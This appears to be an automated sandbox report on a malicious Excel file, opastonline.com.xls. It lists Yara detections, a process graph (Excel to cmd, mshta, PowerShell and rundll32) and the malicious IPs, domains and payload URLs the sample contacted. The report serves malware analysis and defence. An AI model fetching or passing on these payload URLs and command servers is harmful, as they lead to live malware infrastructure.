Source: Yara match File source: 13.2.rundll32.exe.3240000.29.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.260000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2520000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2c60000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3030000.26.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2c90000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2370000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2fb0000.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2370000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2810000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2c90000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.760000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2e60000.21.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.730000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.30a0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.31c0000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.730000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2d20000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.29d0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.340000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2b0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2e30000.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.23a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.31d0000.28.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2f70000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2ad0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2aa0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.9c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.8a0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.410000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2f40000.22.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2de0000.19.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2f40000.22.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2de0000.19.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2ad0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2720000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3000000.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.720000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2810000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2330000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.3030000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.410000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.31a0000.27.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.30d0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.30.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.677067947.0000000002370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.453101619.0000000000150000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.678344656.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677431003.0000000002BD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509305754.0000000003030000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677169719.0000000002810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677889401.0000000003001000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509452651.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.676890629.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677655437.0000000002E31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509112369.00000000023F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.508729235.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509093299.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.508905338.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.508777741.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.511827819.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.676823540.00000000008A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.676935914.00000000009F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.676642352.0000000000730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.512005602.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.678040246.00000000031D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677708619.0000000002E61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.676672140.0000000000761000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677290859.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677828983.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509149844.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509175911.0000000002521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.678097225.0000000003241000.00000020.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677992922.00000000031A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509224243.00000000028F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677771933.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.453319982.0000000000211000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677797866.0000000002F70000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677404297.0000000002BA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677466682.0000000002C61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677573347.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677263877.00000000029A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509407171.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677492210.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509387202.00000000031C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.508826580.0000000000260000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677332473.0000000002AA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.508857582.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677359983.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.511919607.0000000000721000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509354773.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509069868.0000000002331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677545116.0000000002D21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509334125.00000000030A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677930195.0000000003030000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.508950592.0000000000410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509428106.0000000003281000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.676771447.0000000000870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677128024.0000000002721000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.453573074.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677606163.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\JooSee.dll, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562504 Sample: opastonline.com.xls Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 49 129.232.188.93 xneeloZA South Africa 2->49 51 162.214.50.39 UNIFIEDLAYER-AS-1US United States 2->51 53 42 other IPs or domains 2->53 67 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->67 69 Found malware configuration 2->69 71 Antivirus detection for URL or domain 2->71 73 14 other signatures 2->73 14 EXCEL.EXE 53 12 2->14         started        17 svchost.exe 2->17         started        signatures3 process4 file5 47 C:\Users\user\Desktop\opastonline.com.xls, Composite 14->47 dropped 19 cmd.exe 14->19         started        process6 process7 21 mshta.exe 11 19->21         started        dnsIp8 55 91.240.118.172, 49165, 49166, 80 GLOBALLAYERNL unknown 21->55 24 powershell.exe 12 7 21->24         started        process9 dnsIp10 59 weezual.fr 213.186.33.4, 49167, 80 OVHFR France 24->59 61 michaelcrompton.co.uk 217.160.0.155, 49168, 80 ONEANDONE-ASBrauerstrasse48DE Germany 24->61 63 mycloud.suplitecmo.com 24->63 45 C:\ProgramData\JooSee.dll, PE32 24->45 dropped 77 Powershell drops PE file 24->77 29 cmd.exe 24->29         started        file11 signatures12 process13 process14 31 rundll32.exe 29->31         started        process15 33 rundll32.exe 1 31->33         started        file16 43 C:\Windows\SysWOW64\...\pevlwp.arl (copy), PE32 33->43 dropped 65 Hides that the sample has been downloaded from the Internet (zone.identifier) 33->65 37 rundll32.exe 33->37         started        signatures17 process18 process19 39 rundll32.exe 2 37->39         started        dnsIp20 57 160.16.102.168, 49169, 80 SAKURA-BSAKURAInternetIncJP Japan 39->57 75 System process connects to network (likely due to code injection or exploit) 39->75 signatures21
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
195.154.133.20
 unknown France
12876 OnlineSASFR true
185.157.82.211
 unknown Poland
42927 S-NET-ASPL true
212.237.17.99
 unknown Italy
31034 ARUBA-ASNIT true
79.172.212.216
 unknown Hungary
61998 SZERVERPLEXHU true
110.232.117.186
 unknown Australia
56038 RACKCORP-APRackCorpAU true
173.214.173.220
 unknown United States
19318 IS-AS-1US true
212.24.98.99
 unknown Lithuania
62282 RACKRAYUABRakrejusLT true
138.185.72.26
 unknown Brazil
264343 EmpasoftLtdaMeBR true
178.63.25.185
 unknown Germany
24940 HETZNER-ASDE true
160.16.102.168
 unknown Japan 9370 SAKURA-BSAKURAInternetIncJP true
81.0.236.90
 unknown Czech Republic
15685 CASABLANCA-ASInternetCollocationProviderCZ true
103.75.201.2
 unknown Thailand
133496 CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH true
216.158.226.206
 unknown United States
19318 IS-AS-1US true
45.118.115.99
 unknown Indonesia
131717 IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaID true
217.160.0.155
 michaelcrompton.co.uk Germany
8560 ONEANDONE-ASBrauerstrasse48DE false
51.15.4.22
 unknown France
12876 OnlineSASFR true
159.89.230.105
 unknown United States
14061 DIGITALOCEAN-ASNUS true
162.214.50.39
 unknown United States
46606 UNIFIEDLAYER-AS-1US true
200.17.134.35
 unknown Brazil
1916 AssociacaoRedeNacionaldeEnsinoePesquisaBR true
217.182.143.207
 unknown France
16276 OVHFR true
107.182.225.142
 unknown United States
32780 HOSTINGSERVICES-INCUS true
51.38.71.0
 unknown France
16276 OVHFR true
45.118.135.203
 unknown Japan 63949 LINODE-APLinodeLLCUS true
50.116.54.215
 unknown United States
63949 LINODE-APLinodeLLCUS true
131.100.24.231
 unknown Brazil
61635 GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBR true
46.55.222.11
 unknown Bulgaria
34841 BALCHIKNETBG true
41.76.108.46
 unknown South Africa
327979 DIAMATRIXZA true
173.212.193.249
 unknown Germany
51167 CONTABODE true
45.176.232.124
 unknown Colombia
267869 CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOC true
178.79.147.66
 unknown United Kingdom
63949 LINODE-APLinodeLLCUS true
212.237.5.209
 unknown Italy
31034 ARUBA-ASNIT true
162.243.175.63
 unknown United States
14061 DIGITALOCEAN-ASNUS true
176.104.106.96
 unknown Serbia
198371 NINETRS true
207.38.84.195
 unknown United States
30083 AS-30083-GO-DADDY-COM-LLCUS true
164.68.99.3
 unknown Germany
51167 CONTABODE true
192.254.71.210
 unknown United States
64235 BIGBRAINUS true
212.237.56.116
 unknown Italy
31034 ARUBA-ASNIT true
104.168.155.129
 unknown United States
54290 HOSTWINDSUS true
45.142.114.231
 unknown Germany
44066 DE-FIRSTCOLOwwwfirst-colonetDE true
203.114.109.124
 unknown Thailand
131293 TOT-LLI-AS-APTOTPublicCompanyLimitedTH true
209.59.138.75
 unknown United States
32244 LIQUIDWEBUS true
159.8.59.82
 unknown United States
36351 SOFTLAYERUS true
129.232.188.93
 unknown South Africa
37153 xneeloZA true
91.240.118.172
 unknown unknown
49453 GLOBALLAYERNL true
58.227.42.236
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR true
213.186.33.4
 weezual.fr France
16276 OVHFR false
158.69.222.101
 unknown Canada
16276 OVHFR true
104.251.214.46
 unknown United States
54540 INCERO-HVVCUS true

Contacted Domains

Name IP Active
michaelcrompton.co.uk 217.160.0.155 true
weezual.fr 213.186.33.4 true
mycloud.suplitecmo.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://weezual.fr/ju9c/twEHJDCvNwGimD/ true
  • Avira URL Cloud: malware
 unknown
http://91.240.118.172/cc/vv/fe.png true
  • Avira URL Cloud: malware
 unknown
http://michaelcrompton.co.uk/wp-admin/G/ true
  • Avira URL Cloud: malware
 unknown
http://91.240.118.172/cc/vv/fe.html true
  • Avira URL Cloud: malware
 unknown